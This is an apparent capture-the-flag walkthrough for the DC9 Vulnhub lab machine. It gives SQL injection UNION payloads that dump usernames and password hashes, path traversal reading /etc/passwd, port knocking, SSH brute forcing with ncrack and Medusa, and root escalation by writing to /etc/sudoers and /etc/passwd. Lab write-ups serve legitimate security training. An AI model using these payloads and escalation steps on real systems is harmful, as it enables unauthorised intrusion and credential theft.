DC9
DC9 Vulnhub Walkthrough
Enumeration
nmap
There is a website at port 80, let's put our IP on our browser and see what we gets
Exploitation
SQL Injection
After playing SQL injection for some time. I found out that /search.php is inject-able
I used admin' or '1'='1.
As we can see from here all the data successfully retrieve from the database.
After some testing on how many columns I found out there are 6 columns available by using this ' UNION SELECT 1,2,3,4,5,6-- -
By using ' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3,4,5,6 FROM information_schema.schemata-- -
We can see that 2 databases has extracted out. We can extract further by type
Burp
Let's change to burp for easy access
Type this query at the search section and you will get something at the response' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3,4,5,6 FROM information_schema.tables WHERE table_schema = 'Users'-- -
We can see that we have 2 tables named StaffDetails and Users. Meanwhile for the Users, we don't have anything output at the response means that we don't have any tables for Users.
Next, we want to extract columns from the tables
Type this
' UNION SELECT GROUP_CONCAT(TABLE_NAME,':',COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns WHERE table_schema="Staff"-- -
to extract.
We got all the columns from 2 tables
Lets put it at terminal and separate it correctly
We then extract the user tables columns
' UNION SELECT GROUP_CONCAT(table_name,':',column_name),2,3,4,5,6 FROM information_schema.columns WHERE table_schema='users'-- -
Put it to terminal again and separate it correctly
Got this 2 tables' columns ! Let's save it for later reference.
Let's take Staff tables and extract the columns.
I saw that there are Username and Password. Let's extract that by typing
' UNION SELECT GROUP_CONCAT(Username,':',Password),2,3,4,5,6 FROM Staff.Users-- -
Save it in CherryTree and extract another table.
' UNION SELECT GROUP_CONCAT(username,':',password),2,3,4,5,6 FROM users.UserDetails-- -
Got this, do the same thing as before
Now we can login using the admin credentials but before that, let's crack the md5 hash first
Go to this website, and choose md5 hash, crack it!
The password is transorbital1
Login using the credentials at /manage.php
Wfuzz
We see file does not exist, so I decided to use wfuzz
After some tries, we need to grab the PHPSESSID from burp then we need to specify it inside the command. and we need to put ../../../../../etc/passwd to let it find what the fuzz is. Basically just bunch of try and errors. Besides, we need to see the length of the word so we can hide it. We need to run without --hwfirst, then only specify the length of the word in order to hide it. Command looks like this
We can see that it is 100 word so we can specify the parameter --hw as 100
We can see that it is the file parameter.
Searching For Good Stuff
If at the end of the URL we put ?file=../../../../../etc/passwd , we will get something like this.
After further enumeration, from Ippsec video, I know that inside proc directory a file called sched_debug contains all the process that run within the machine
it's kinda long, let's save it in the file.
Then, we only want to see the task, use awk to print the task column only
Port Knocking
After that I saw knockdis running, still remember the nmap scan?
the ssh port 22 is filtered, let's first navigate to the file see what we got at /etc/knockd.conf
We can see that if we want to let the port to be opened, we need to follow the port correctly in order, 7469,8475,9842 , if we want to close the port, then do it in other way.
Since we want the port to be open, we can use nmap to help us to run the port by using -r parameter
Run the normal nmap scan again
We can see that the ssh port is open now.
Now, we can use the credentials we got just now and let it brute forcce
We need to split the username and password into 2 files
Ncrack
Then we can use ncrack to brute force the ssh logins
Now we can login !
Privilege Escalation
After some logins, I found that janitor user has a file called .secrets-for-putin
After cat the file inside the directory, we got some passwords
Save the passwords into a file and use the users file and use nrack to crack again
I faced some problem to use ncrack so I change to Medusa.
We found out that user fredf can be logged in
Method 1
Then, type sudo -l
We can see that there is a sudo rights can be exploited.
run sudo /opt/devstuff/dist/test/test
Got this, we can see that test.py is not running properly. Navigate to /opt/devstuff and we can find the test.py file
We can use nano test.py
We can see that, if the input argument is not equal to 3, then the code will return the error and exit. But if we have 3 arguments, then the first file will be read mode and it will append to the second file.
Navigate to /tmp
We can put fredf ALL:NOPASSWD:ALL into a file by echo "fredf ALL=(ALL:ALL) ALL" > sudo_Add
We need first copy the content of /etc/sudoers to /tmp/sudo_Add by sudo /opt/devstuff/dist/test/test /etc/sudoers sudo_Add
Then we can type sudo /opt/devstuff/dist/test/test /tmp/sudo_Add /etc/sudoers to read the line from out sudo_Add file and append to the /etc/sudoersfile
Then, we can type sudo -l again.
Type sudo /bin/bash then we will get root
Method 2
We can use openssl to create a password then append it to the /etc/passwd
Then we use cat /etc/passwd | grep fredf to get the passwd that we want to modify
Original
fredf is the username
x is the hash
1003 is the id and gid
then the name, directory and type of shell
Modified
0 indicates is root id and gid
Let's run the sudo /opt/devstuff/dist/test/test sudo_Add /etc/passwd
Then we su to the username that we created, for me is choo
Password is the second argument of this command, so is damn
Got root !
Congratulation!
Last updated
